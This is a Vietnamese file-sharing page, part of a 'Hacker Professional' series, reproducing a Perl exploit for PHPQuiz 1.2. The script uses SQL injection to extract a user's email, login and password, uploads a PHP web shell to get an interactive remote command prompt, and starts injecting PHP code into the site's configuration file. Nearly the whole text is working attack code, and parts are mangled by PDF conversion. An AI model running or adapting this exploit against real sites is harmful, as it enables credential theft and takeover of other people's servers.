
Hacker Professional part 419

Chia sẻ: Angel Smile | Ngày: | Loại File: PDF | Số trang:5


Tham khảo tài liệu 'hacker professional part 419', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả


Nội dung Text: Hacker Professional part 419

  1. black_hat_cr(HCE) HPQuiz 1.2 Remote SQL injection/Code Execution Exploit Code: #!/usr/bin/perl use IO::Socket ; use LWP::Simple ; print q( /-----------------------------------------------------------\ | PHPQuiz v.1.2 Remote SQL injection/Code Execution Exploit | | Coded by simo64 - simo64_morx.org | | www.morx.org | |-----------------------------------------------------------| | MorX Security Research Team © | \-----------------------------------------------------------/ ); sub usage(){ print "\nUsage :perl $0 siteurl /path/ userid\n"; print "\nExemple : perl $0 phpquiz.com /phpquiz/ 1\n"; } if(!@ARGV){ &usage(); exit(0) } $host = $ARGV[0]; $path = $ARGV[1]; $uid = $ARGV[2];
  2. $success = null ; $injected = 0; $injcheck = $path."cfgphpquiz/config.inc.php?xD=l3fou"; $phpinject = $path."cfgphpquiz/install.php?submit=Valider&config_alert_email_name=%22;ec ho%20\@\$xD;\@system(\$morx);//MorX%20RulZ%20=)"; $injectuser = "front/?what=score&univers=- 64%20UNION%20SELECT%20null,LOGIN,null,null,null,null,null,null,null,null %20FROM%20user%20WHERE%20ID=$uid/*"; $injectpass = "front/?what=score&univers=- 64%20UNION%20SELECT%20null,PWD,null,null,null,null,null,null,null,null%2 0FROM%20user%20WHERE%20ID=$uid/*"; $injectmail = "front/?what=score&univers=- 64%20UNION%20SELECT%20null,EMAIL,null,null,null,null,null,null,null,null %20FROM%20user%20WHERE%20ID=$uid/*"; syswrite STDOUT , "Connecting to $host ..."; my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); die "\n\nUnable to connect to $host " unless($sock) ; syswrite STDOUT , "\tConnected !\n\n\[+] Injecting credentials\n\nSending Data ..."; print $sock "GET $path$injectmail HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Connection: Close\n\n"; while($res = ){ if($res =~ /anim_fleche_droite.gif" border="0"> "(.*?)"/){ $usermail = $1 ; $success = "ok" ; } }
  3. if($success eq "ok") { syswrite STDOUT , "\n\nSQL injection Succeded !\n\n"; sleep 2 ; syswrite STDOUT , "\tUser EMail : $usermail\n"; my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); print $sock "GET $path$injectuser HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Connection: Close\n\n"; while($res = ){ if($res =~ /> "(.*?)"/){ $userlogin = $1 ; } } syswrite STDOUT , "\tUser Login : $userlogin\n"; my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); print $sock "GET $path$injectpass HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Connection: Close\n\n"; while($res = ){ if($res =~ /> "(.*?)"/){ $userpass = $1 ; } } syswrite STDOUT , "\tUser Passwd : $userpass\n\n"; } else {print "\n\nInjecting credentials Exploit Failed !\n\n";} sleep 2;
  4. # PART2 Remote Command Execution by uploaing shell syswrite STDOUT , "\n[+] Exec CMD by uploading a shell"; my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); die "\n\nUnable to connect to $host " unless($sock) ; syswrite STDOUT , "\tConnected !\n\n"; syswrite STDOUT , "Uploading shell ..."; $data='-----------------------------7d61592213049c Content-Disposition: form-data; name="dir" / -----------------------------7d61592213049c Content-Disposition: form-data; name="image"; filename="zaz.php" Content-Type: text/plain -----------------------------7d61592213049c Content-Disposition: form-data; name="submit" Upload -----------------------------7d61592213049c-- '; $script = $path."/back/upload_img.php?upload=1&ok_update=yes&path=./../img_quiz/zaz.p hp"; $len = length $data ; print $sock "POST $script HTTP/1.0\r\n";
  5. print $sock "Content-Type: multipart/form-data; boundary=-------------------------- -7d61592213049c\r\n"; print $sock "Host: $host\r\n"; print $sock "Content-Length: $len\r\n"; print $sock "Connection: close\r\n\r\n"; print $sock $data; syswrite STDOUT , "\t[OK]\n\nChecking if successfully Uploaded .... "; my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); print $sock "HEAD $path"."img_quiz/zaz.php HTTP/1.0\r\n"; print $sock "Host: $host\r\n"; print $sock "Connection: close\n\n"; while($rep = ){ if($rep =~ /HTTP\/1.1 200 OK/) { $success = 1; } } if($success == 1){ print "\t[OK]\n\n\t\tNOW YOU CAN LAUNCH COMMANDS\n\n"; while(){ print "simo64[at]morx.org :~\$ "; chop($cmd=); exit() if ($cmd eq 'exit'); $result = get("http://$host".$path."img_quiz/zaz.php?cmd=$cmd"); print $result; } } else { print "\tFailed !\n\nFile Upload Failed\n\n" } # STEP 3 Injecting PHPcode into config.inc.php file print "\n[+] Injecting PHP Code......\n\nConnecting ....";